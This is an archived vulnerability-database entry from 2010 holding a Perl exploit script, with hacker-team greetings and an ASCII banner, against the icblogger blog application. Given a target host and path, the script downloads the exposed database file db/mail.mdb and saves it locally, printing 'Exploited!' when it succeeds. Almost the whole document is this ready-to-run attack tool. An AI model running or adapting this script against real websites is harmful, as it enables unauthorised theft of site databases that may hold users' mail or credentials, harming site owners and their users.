icblogger full-(tr) (mail.mdb) Database Disclosure Exploit

2010-10-19T00:00:00
ID SECURITYVULNS:DOC:24950
Type securityvulns
Reporter Securityvulns
Modified 2010-10-19T00:00:00

Description

!/usr/bin/perl -w

icblogger full-(tr) (mail.mdb) Database Disclosure Exploit

Found & Coded: indoushka

Date: 25/07/2010

Home: http://www.hack-r1z.com/cc/

Dz-Ghost Team ===== Saoucha * Star08 * Cyber Sec * theblind74 * XproratiX * onurozkan * n2n * Meher Assel ===========================

special thanks to : r0073r (inj3ct0r.com) * L0rd CruSad3r * MaYur * MA1201 * KeDar * Sonic * gunslinger_ * SeeMe * RoadKiller

Sid3^effects * aKa HaRi * His0k4 * Hussin-X * Rafik * Yashar * SoldierOfAllah * RiskY.HaCK * Stake * r1z * D4NB4R * www.alkrsan.net

MR.SoOoFe * ThE g0bL!N * AnGeL25dZ * ViRuS_Ra3cH * Sn!pEr.S!Te

---------------------------------------------------------------------------------------------------------------------------------

Download : http://www.aspdunyasi.com

use LWP::Simple; use LWP::UserAgent;

system('cls'); system('title icblogger full-(tr) (mail.mdb) Database Disclosure Exploit'); system('color a');

if(@ARGV < 2) { print "[-]How To Use\n\n"; &help; exit(); } sub help() { print "[+] usage1 : perl $0 site.com /path/ \n"; print "[+] usage2 : perl $0 localhost / \n"; }

print "\n************\n"; print "\n1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0\n"; print "\0 _ 1\n"; print "\1 /' \ /'`\ /\ \ /'`\ 0\n"; print "\0 /\, \ /\\/\_\ \ \ \ \ ,\/\ \/\ \ _ 1\n"; print "\1 \//\ \ /' _ `\ \/\ \//\< /'\ \ \/\ \ \ \ \/\`'\ 0\n"; print "\0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \/\ \ \\ \ \\ \ \ \/ 1\n"; print "\1 \ \\ \\ \\\ \ \ \_/\ \_\\ \\\ \_/\ \\ 0\n"; print "\0 \//\//\//\ \\ \// \/_/ \/_/ \// \/_/ 1\n"; print "\1 \ \_/ >> Exploit database separated by exploit 0\n"; print "\0 \// type (local, remote, DoS, etc.) 1\n"; print "\1 1\n"; print "\0 [+] Site : Inj3ct0r.com 0\n"; print "\1 [+] Support e-mail : submit[at]inj3ct0r.com 1\n"; print "\0 0\n"; print "\1 ####################################### 1\n"; print "\0 I'm indoushka member from Inj3ct0r Team 1\n"; print "\1 ####################################### 0\n"; print "\0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1\n"; ($TargetIP, $path, $File,) = @ARGV;

$File="db/mail.mdb"; my $url = "http://" . $TargetIP . $path . $File; print "\n wait!!! \n\n";

my $useragent = LWP::UserAgent->new(); my $request = $useragent->get($url,":content_file" => "D:/mail.mdb");

if ($request->is_success) { print "[+] $url Exploited!\n\n"; print "[+] Database saved to D:/mail.mdb\n"; exit(); } else { print "[!] Exploiting $url Failed !\n[!] ".$request->status_line."\n"; exit(); }